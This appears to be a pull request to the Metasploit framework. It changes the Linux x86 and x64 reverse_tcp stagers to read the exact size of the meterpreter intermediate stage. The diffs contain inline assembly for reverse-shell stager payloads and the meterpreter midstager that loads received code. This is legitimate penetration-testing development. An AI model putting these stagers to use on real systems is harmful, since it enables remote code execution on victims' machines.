### PR TITLE
Linux reverse_tcp should read known # of bytes

### DIFF
--- a/lib/msf/core/payload/linux/reverse_tcp.rb
+++ b/lib/msf/core/payload/linux/reverse_tcp.rb
@@ -93,8 +93,10 @@ module Payload::Linux::ReverseTcp_x86
       pay_mod = framework.payloads.create(self.refname)
       read_length = pay_mod.generate_intermediate_stage(pay_mod.generate_stage(datastore.to_h)).size
     else
-      read_length = 4096
+      read_length = 2048
     end
+
+    read_reg = read_length.to_s(16).size > 4 ? 'edx' : 'dx'
 
     asm = %Q^
         push #{retry_count}        ; retry counter
@@ -163,7 +165,7 @@ module Payload::Linux::ReverseTcp_x86
         mov ecx, esp
         cdq
         mov dh, 0xc
-        push   0x#{read_length.to_s(16)}
+        mov #{read_reg},  0x#{read_length.to_s(16)}
         mov al, 0x3
         int 0x80                  ; sys_read (recv())
         test eax, eax

--- a/lib/msf/core/payload/linux/reverse_tcp.rb
+++ b/lib/msf/core/payload/linux/reverse_tcp.rb
@@ -89,6 +89,13 @@ module Payload::Linux::ReverseTcp_x86
     sleep_seconds = seconds.to_i
     sleep_nanoseconds = (seconds % 1 * 1000000000).to_i
 
+    if respond_to?(:generate_intermediate_stage)
+      pay_mod = framework.payloads.create(self.refname)
+      read_length = pay_mod.generate_intermediate_stage(pay_mod.generate_stage(datastore.to_h)).size
+    else
+      read_length = 4096
+    end
+
     asm = %Q^
         push #{retry_count}        ; retry counter
         pop esi
@@ -156,6 +163,7 @@ module Payload::Linux::ReverseTcp_x86
         mov ecx, esp
         cdq
         mov dh, 0xc
+        push   0x#{read_length.to_s(16)}
         mov al, 0x3
         int 0x80                  ; sys_read (recv())
         test eax, eax

--- a/lib/msf/core/payload/linux/reverse_tcp.rb
+++ b/lib/msf/core/payload/linux/reverse_tcp.rb
@@ -89,14 +89,30 @@ module Payload::Linux::ReverseTcp_x86
     sleep_seconds = seconds.to_i
     sleep_nanoseconds = (seconds % 1 * 1000000000).to_i
 
+    mprotect_flags = 0b111 # PROT_READ | PROT_WRITE | PROT_EXEC
+
     if respond_to?(:generate_intermediate_stage)
       pay_mod = framework.payloads.create(self.refname)
       read_length = pay_mod.generate_intermediate_stage(pay_mod.generate_stage(datastore.to_h)).size
     else
-      read_length = 2048
+      # If we don't know, at least use small instructions
+      read_length = 0x0c00 + mprotect_flags
     end
 
-    read_reg = read_length.to_s(16).size > 4 ? 'edx' : 'dx'
+    # I was bored on the train, ok?
+    read_reg =
+      if read_length % 0x100 == mprotect_flags && read_length <= 0xff00 + mprotect_flags
+        # We use `edx` as part mprotect, but at two bytes assembled, this edge case is worth checking:
+        # If the lower byte will be the same, just set the upper byte
+        read_length = read_length / 0x100
+        'dh'
+      elsif read_length < 0x100
+        'dl' # Also assembles in two bytes ^.^
+      elsif read_length < 0x10000
+        'dx' # Shave a byte off of setting `edx`
+      else
+        'edx' # Take five bytes :/
+      end
 
     asm = %Q^
         push #{retry_count}        ; retry counter
@@ -150,7 +166,7 @@ module Payload::Linux::ReverseTcp_x86
 
     asm << %Q^
       mprotect:
-        mov dl, 0x7
+        mov dl, 0x#{mprotect_flags.to_s(16)}
         mov ecx, 0x1000
         mov ebx, esp
         shr ebx, 0xc
@@ -164,7 +180,6 @@ module Payload::Linux::ReverseTcp_x86
         pop ebx
         mov ecx, esp
         cdq
-        mov dh, 0xc
         mov #{read_reg},  0x#{read_length.to_s(16)}
         mov al, 0x3
         int 0x80                  ; sys_read (recv())

--- a/lib/msf/core/payload/linux/reverse_tcp.rb
+++ b/lib/msf/core/payload/linux/reverse_tcp.rb
@@ -94,6 +94,8 @@ module Payload::Linux::ReverseTcp_x86
     if respond_to?(:generate_intermediate_stage)
       pay_mod = framework.payloads.create(self.refname)
       read_length = pay_mod.generate_intermediate_stage(pay_mod.generate_stage(datastore.to_h)).size
+    elsif !module_info['Stage']['Payload'].empty?
+      read_length = module_info['Stage']['Payload'].size
     else
       # If we don't know, at least use small instructions
       read_length = 0x0c00 + mprotect_flags

--- a/lib/msf/core/payload/linux/x64/reverse_tcp.rb
+++ b/lib/msf/core/payload/linux/x64/reverse_tcp.rb
@@ -112,7 +112,6 @@ module Payload::Linux::ReverseTcp_x64
 
         push   #{retry_count}        ; retry counter
         pop    r9
-        push   rsi
         push   rax
         push   0x29
         pop    rax

--- a/lib/msf/core/payload/linux/x64/reverse_tcp.rb
+++ b/lib/msf/core/payload/linux/x64/reverse_tcp.rb
@@ -88,7 +88,12 @@ module Payload::Linux::ReverseTcp_x64
     seconds = (opts[:sleep_seconds] || 5.0)
     sleep_seconds = seconds.to_i
     sleep_nanoseconds = (seconds % 1 * 1000000000).to_i
-
+    if respond_to?(:generate_intermediate_stage)
+      pay_mod = framework.payloads.create(self.refname)
+      read_length = pay_mod.generate_intermediate_stage(pay_mod.generate_stage(datastore.to_h)).size
+    else
+      read_length = 4096
+    end
     asm = %Q^
       mmap:
         xor    rdi, rdi
@@ -161,8 +166,9 @@ module Payload::Linux::ReverseTcp_x64
 
       recv:
         pop    rsi
+        push   0x#{read_length.to_s(16)}
         pop    rdx
-        syscall ; read(3, "", 4096)
+        syscall ; read(3, "", #{read_length})
         test   rax, rax
         js     failed
 

--- a/lib/msf/core/payload/linux/x64/reverse_tcp.rb
+++ b/lib/msf/core/payload/linux/x64/reverse_tcp.rb
@@ -88,12 +88,16 @@ module Payload::Linux::ReverseTcp_x64
     seconds = (opts[:sleep_seconds] || 5.0)
     sleep_seconds = seconds.to_i
     sleep_nanoseconds = (seconds % 1 * 1000000000).to_i
+
     if respond_to?(:generate_intermediate_stage)
       pay_mod = framework.payloads.create(self.refname)
       read_length = pay_mod.generate_intermediate_stage(pay_mod.generate_stage(datastore.to_h)).size
+    elsif !module_info['Stage']['Payload'].empty?
+      read_length = module_info['Stage']['Payload'].size
     else
       read_length = 4096
     end
+
     asm = %Q^
       mmap:
         xor    rdi, rdi

--- a/modules/payloads/stagers/linux/x64/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/x64/reverse_tcp.rb
@@ -8,7 +8,7 @@ require 'msf/core/payload/linux/x64/reverse_tcp'
 
 module MetasploitModule
 
-  CachedSize = 133
+  CachedSize = 130
 
   include Msf::Payload::Stager
   include Msf::Payload::Linux::ReverseTcp_x64

--- a/modules/payloads/stagers/linux/x64/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/x64/reverse_tcp.rb
@@ -8,7 +8,7 @@ require 'msf/core/payload/linux/x64/reverse_tcp'
 
 module MetasploitModule
 
-  CachedSize = 129
+  CachedSize = 130
 
   include Msf::Payload::Stager
   include Msf::Payload::Linux::ReverseTcp_x64

--- a/modules/payloads/stagers/linux/x64/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/x64/reverse_tcp.rb
@@ -8,7 +8,7 @@ require 'msf/core/payload/linux/x64/reverse_tcp'
 
 module MetasploitModule
 
-  CachedSize = 130
+  CachedSize = 133
 
   include Msf::Payload::Stager
   include Msf::Payload::Linux::ReverseTcp_x64

--- a/modules/payloads/stages/linux/x86/meterpreter.rb
+++ b/modules/payloads/stages/linux/x86/meterpreter.rb
@@ -34,10 +34,10 @@ module MetasploitModule
     elf.elf_header.e_entry
   end
 
-  def handle_intermediate_stage(conn, payload)
+  def asm_intermediate_stage(payload)
     entry_offset = elf_ep(payload)
 
-    midstager_asm = %(
+    %(
       push edi                    ; save sockfd
       xor ebx, ebx                ; address
       mov ecx, #{payload.length}  ; length
@@ -85,8 +85,14 @@ module MetasploitModule
       add edx, eax
       jmp edx
     )
+  end
 
-    midstager = Metasm::Shellcode.assemble(Metasm::X86.new, midstager_asm).encode_string
+  def generate_intermediate_stage(payload)
+    Metasm::Shellcode.assemble(Metasm::X86.new, asm_intermediate_stage(payload)).encode_string
+  end
+
+  def handle_intermediate_stage(conn, payload)
+    midstager = generate_intermediate_stage(payload)
     vprint_status("Transmitting intermediate stager...(#{midstager.length} bytes)")
     conn.put(midstager) == midstager.length
   end


### PR DESCRIPTION
The linux x64 reverse tcp stager is hardcoded to read 4K off the
socket. When a small intermediate stager is used, this can result
in reading part of the next stage as well, which means that the
intermediate stager will never recv the # of bytes it needs and
hang indefinitely.

Break out the mettle piece to use separate methods for assembly and
binary payload generation as well as actually putting the product
on the existing session socket.

Change the first part of the stage to check for the intermediate
stager generation method, and use the size of the produced stager
in the recvfrom call or fall back to the prior 4K read size.

Testing:
  None yet

Ping @bcook-r7, @acammack-r7, @OJ, @ZeroSteiner
